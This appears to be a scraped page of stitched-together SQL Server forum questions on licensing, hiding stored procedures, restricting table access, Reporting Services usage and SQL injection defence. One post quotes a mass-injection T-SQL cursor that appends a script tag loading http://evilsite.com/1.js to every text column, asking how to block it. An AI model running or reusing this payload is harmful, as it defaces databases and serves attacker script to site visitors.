I have developed some custom SQL reports that query a major software vendor's SQL Database, and I would like to sell them commercially.
The only problem is that I dont know how to protect them from casual piracy? Ideally I would like to tie them into a uniqueness of the database server eg the machine SID or similar but have no experience of this..
Can anyone recommend a way of commercially protecting the code pleaaaase?
Thanks!
Hello Everyone,I have been searching hard to get an answer on this question, I hope someone here can help me!Here is my situation:I am planning to build a website for them, that would be used for some event registration (by people outside my company). I also plan to use SQL Express Edition as the database backend for the site. Now this is where I have a question, can I use SQL Express and pay nothing? (It is free right?) There would be a maximum of 600 registrations over a period of 1 month. I don't expect more than 50 concurrent users. The administration side of the application would be used by internal employees (So, the application would be used by internal employees and external people). Where can I find more information about the license?I would be very thankful if someone can guide me on this.ASP_Newbie
View 3 Replies View Relatedalso, how can i retrieve data ? no interface for that?
does it have stored procedure function?
I'm working on a server based ASP.NET app.
I'd also like to deploy it as a single user version.
Rather than rewrite it to .Net windows (at least initially), I'm thinking about having the user install Cassini and SQL Server Express on their machines, and run the app as a "local" web app.
Clearly, there are a lot of issues to consider.
One is whether to even think about using SQL Server Express for this.
So, two questions on that, initially:
Q1) Are there any licensing issues? I would direct the user to download directly from MS.
Q2) What would it take to get SQL Server Express and the application to start talking to each other once SQL, Cassini and the application files were installed?
> I'm assuming I would have to build "data base initiation" and "file create" procedures, etc., but what about just having the App find SQL, start it, and get it configured, etc for use. How hard would it be to proceduralize this so that it would look to the user like a "standard" application software installation procedure?
Any guidance on this would be appreciated.
Thanks!
Thanks,
View 1 Replies View RelatedDoes anyone know of such a task than runs under both x86 and x64? (I know a FileWatcher add-in but it was built using Beta verisons of VS.NET)
TIA,
barkingdog
Does anyone know if it is legal to use SQL Server 2005 Express in a commercial website? There is no need for SQL Server 2005 so the Express would do the job great.Thx, Viktor
View 2 Replies View RelatedHi,
View 5 Replies View Related1Is it possible to choose local user,(instead of local system) in sql setup service login and then use mixed mode
default configuration in report server or choose configure server later. I will be using a third party host using vista, unfortunately I do not have my own server ( I do not have a domain yet)
vista sql 2005 standard vs 2008. ultimate
2 What is the best configuration for a new aspiring asp.net ssrs developer.
3 Do I need to configure the server if I choose local user?
4. what is the best way to configure sql?
By the way what items
should I look forward in choosing a web host,(who is willing to give alot of help to developers) my interests include ssrs 2008 sql 2008 sql 2005
asp.net mvc, crystal reports, wcf infragistics. I am really interested in showing
examples in sql reporting services, crystal reports wcf , web services , infragistics
asp.net mvc intrigues me.......
I would like to get on a track to eventually use sharepoint services
Thanks again, I know I ask I alot of questions........
Hello,
I am building a website in ASP.net 2.0 and I want to protect my self from sql Injection.
I am half way there in that I have built my own class that I use to check any input to the Database from a textbox (or user input) for specific characters that cause trouble, such as the “ ‘ � or “;� it then converts them to my own code for example “ ’ � = |^| the same function will convert my “code� back to the original character which works great until I get to Gridviews and Forum View.
Does anyone know how I would access the class I created through the gridview and formview so that any info they display gets first translated through my class.
Or if that is not possible how I would set the grideview or formview to translate the “codes� for me.
If I am totally off track here and there is a much better way to do all this then I am all ears. Please keep in mind I will require the “bad� characters to be saved in some way shape or form.
Thanks
I have a VB6 program that is using MS-SQL Server 2000. The people using the program can access the database and modify the records. This is fine except for one table.
Is it possible to prevent users from modifying one table (they can still view it) and allowing me and the VB program to acces this table?
I am currently writing a VB app based around a SQLserver2000 database. I have used stored procedures wherever possible to select/update/delete data. I am planning to distribute this app and wonder whether there are any tricks out there for encrypting/setting security so that even the SA account would be unable to read my stored procedures, but obviously be able to execute them?
There are two scenarios - one is where I want to let someone borrow a laptop just for a few days for a demo. Presumably I just give them an unprivileged user account without interactive logon possibilities, by which I mean Enterprise Manager and the other SQLserver Client tools [can I do this?] and control all access from the app.
The other scenario is when the app is purchased and I no longer have control of the SQL Server nor the SA account.
Any pointers would certainly be very useful indeed. Thanks.
Andy writes "Good day Gurus!
I have a question regarding how to protect my SQL data. My Material Resource Planning software is built on SQL. There is a problem with my data and possibly a bug in the vendors software. They are asking me to send them my database.
My database contains vendors, customers, pricing partlists and procedures. The advantage of an MRP/ERP system is that the data is all in one place; the disadvantage is that if I send it out to the vendor, they have access to all that I do. This vendor also supports some of my competitors. My concern is that all it would take is one vendor employee to jump ship with my data on a dongle and I could end up completely compromised as a company.
Is there a way of easily or is there software that can leave the significant data in tact but replace the confidential data with meaningless information?
Significant data would be numbers, costs, etc, or data that I choose. Confidential data would be vendors, customers, etc.
It seems to me that this would be a fairly common problem, but I cannot find a solution that is both quick and effective.
Thanks for your collective thoughts.
Andy,"
I've been trying to look for information about using an SQL 2005 database with ASP.NET 2.0 - while there are loads of different articles coving configuring a database to use with asp.net, I cannot find anything on securing a sub-folder in my asp.net application. At the moment I am successfully connecting to, and validating users via a login page in my asp.net application, however, this is all pointless since I can still browse to the pages without logging in! I have tried putting in the usual <location> tags in my root web.config file and asp.net throws an error referring to my connection string, I have also tried adding a web.config file to the sub-directory, but that just uses the windows login, and I can't find anything that'll allow me to tie my own login page to it... Arrrgh! Any help will be greatly appreciated!
Thanks in advance.
I have a database installed on my server, and i have put a database on user "sa" , so when any user wants to view the database he must enter the password to view its content. But i have dicover that if the user make the authentication "Windows Authentication" and opened the database it will be opned without the need to enter the password !!! and for this i cant restrict the access for my database from un-authorized people.
Can any one tell me how i can restrict view database content unless entering the password?
Thaks
Hello,I wrote some complicated functions (and stored procedures) in databaseat my work. System administrator (and every db user) can view codes(in Enterprise Manager for eg.). My employer needs periodic modifyingof code and so I'm required to do it. But I can loose my job :)because users are able to modify code (althout they ware too lazy tocreate it by themselves).Is this possible to protect functions from view it?[please, don't mind my english]
View 5 Replies View RelatedHidoes anyone know of a way of giving developers read only access to adatabase diagram in Enterprise Manager (SQL Server 2000). The database wassupplied by a third party and we don't want them tinkering with it, butthey do need to be able to create additional tables etc. to extend thefunctionality of the package.TIAChloe Crowder
View 2 Replies View RelatedHi,I need to provide a facility to do routine database administration(backups, etc.) without allowing the logged in user to modify thedata in any of the SQL server tables. Is there any way to accomplishthis (such as maybe password protecting the tables or otherwise)? I amfairly new to SQL server - so would appreciate any pointers to this.Thanks a ton!Regards,Radha
View 1 Replies View RelatedHelloo all,
I would like to gather some thoughts on how to secure my database (running on sql server 2005) from SQL injection , one such as :
Code Snippet
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR
b.xtype = 35 OR
b.xtype = 231 OR
b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
Basically this statement finds every text column contained in a database and inserts a cross site script into it.
I know this topic has been covered in some depth in articles such as :
MSDN article on SQL injection (http://msdn.microsoft.com/en-us/library/ms161953.aspx)
and on forums a few times.
And the general consensus is to check application code and fix it, which is fine, however we have many legacy systems where it would be too time consuming to fix the problem at the application level.
So the alternative is fix this at the database level.
A possible solution is to isolate the application access to only the objects it uses, and none of the system objects. This should prevent the statement above from running, because it requests access to the sysobjects and syscolumns views. I could implement this by changing the schema for all user objects from dbo to [myAppSchema] and assigning it to my applications database user.
Not particularly elegant but might work, what do you think?
Nigel.
In SRS is there a simiple way to password protect a report? Or will I need to handle this in ASP?
View 4 Replies View Related
I am creating a .NET application with a SQL database (SQL 2005). The database will be installed at the clients site. I would like to keep them from viewing my Tables, Stored Procedures, etc. I have read several posts on here and no one has given a solution to this, is this possible in SQL?? I am also currently encrypting/decrypting the table data in my SP's but what is to prevent the client from writing an application that accesses my SP's and therefore retrieving the decrypted data??
I have a Windows Forms 2.0 application with which I am distributing a SQL Express database. I am currently using User Instances. Due to HIPAA requirements, I need to prevent any consumers from accessing the data within the database. Only the application should be able to expose the data. Ideally, I would like to hard code credentials into the compiled code to do this. How can I accomplish this ?
View 1 Replies View RelatedI have several sites which refer to a table in an MS SQL data base on the server.
I'm looking for a good way to check that my tables don't get corrupted
over time. It seems that I can't create a duplicate by selecting the
individual table and going SaveAs..
Can someone point me to the fool proof method that everyone else already uses, please ?
David Morley
Hi I am using sql server 2005 express and would like to keep all my fields from being both updated and deleted.
In other words, once I create a new record, I would like to have it protected from being deleted and I dont want the field values to be updated/changed from the values initially entered. Is there a way to this without running triggers or changing database permissions and user roles?
I tried making the database read-only, but then of course i cant add new records.
Thanks
Lets assume SQL Server 2005 running on Windows 2003 Server, connected to a network but not part of the domain. One application accesses it over the network with one login. Either SQL Server or a local windows login is used for authentication. This would protect SQL Server if the domain was compromised. I can see in normal circumstances domain level logins should be used, but in certain scenerios where the security of the SQL Server box is top would this be a good solution?
Thanks
Danny
Hello all, I have an app that is distributed to buyers and is registered on a per-computer basis. I am currently using SQL Server 2005. I have created my own registration process in which I can create a registration key file that my app reads to see the maximum # of uses of the app are allowed. I am saving the # of uses in a "keyuses" table. I need to protect this table from the users logging into the server with windows authentication and being able to edit the information in this table. I am used to Firebird, in which the security is totally user based, no windows authentication. You must explicitly grant access to every table for each user, or to the public user that represents every user. Anyways, I am pretty new to SQL server 2005. I know that there must be a way to protect a table from any modification except by a "SQL Authentication" user, which requires a username and password.
Thank you all!
Branden Johnson
Does anyone know how I can password protect XP Professional Control Panel?ThanksRonnie
View 1 Replies View RelatedDear GroupI'd be grateful if you can give me some advice on the following.An application I wrote uses an MSDE backend and I wonder whetherthere's a way (even for the system administrator) of not seeing ortracing stored procedure code, view and table designs?And I also wonder whether you can advise me on an installer thathandles MSDE and database setup during installation without too mucheffort but is still affordable < USD 1000.Any articles, resources, advice hints for these two topics are veryappreciated.Thank you very much for your help & efforts!Martin
View 3 Replies View RelatedHello SQL Server Experts, Data Analysts, and Report Writers et al:
re: Reporting Options with SQL Server
I wanted to propose an offshoot to the pryor thread:
Would anyone take a stab at comparing Access Reports, Crystal Reports,
Cognos or other options to all the Reporting Services and its components offered as part ofSQL Server, especially as to extracting data from SQL Server into a report format?
I guess this is a far as capabilites, ease of use, limitations, and especially formatting
or presentation of the end report product?
Thank you to all, and I hope this is a beneficial discussion to others.
Hal1490
Hal9000
I have an already published application running several MS SQL Server 2000 Reporting Services report.
I need a way to find from either the reporting services log or the application server (IIS) logs or windows log
to know the frequency of each report being used.
Based on this info, the business needs to know which reports are being used and to what extend?
How can I acheive this?
I have already got the IIS logs and it did not give the required info.
I have looked into the Reporting Services logs but it does not provide the info either.
Any help is appreciated
I have an already published application running several MS SQL Server 2000 Reporting Services report.
I need a way to find from either the reporting services log or the application server (IIS) logs or windows log
to know the frequency of each report being used.
Based on this info, the business needs to know which reports are being used and to what extend?
How can I acheive this?
I have already got the IIS logs and it did not give the required info.
I have looked into the Reporting Services logs but it does not provide the info either.
Any help is appreciated
Hi does anyone know how to do the above with out going through reportserver url?
Preferably by using a cmd tool ? such rs.exe
or through the backend in the reportserver DB?
Thanks
Dave
Hi Friends,
Could I migrate the reports which are developed on SQL 2000 to SQL 2005. If Yes then How ...
Could anyone explain me. How it works.
Thanks
sqlferns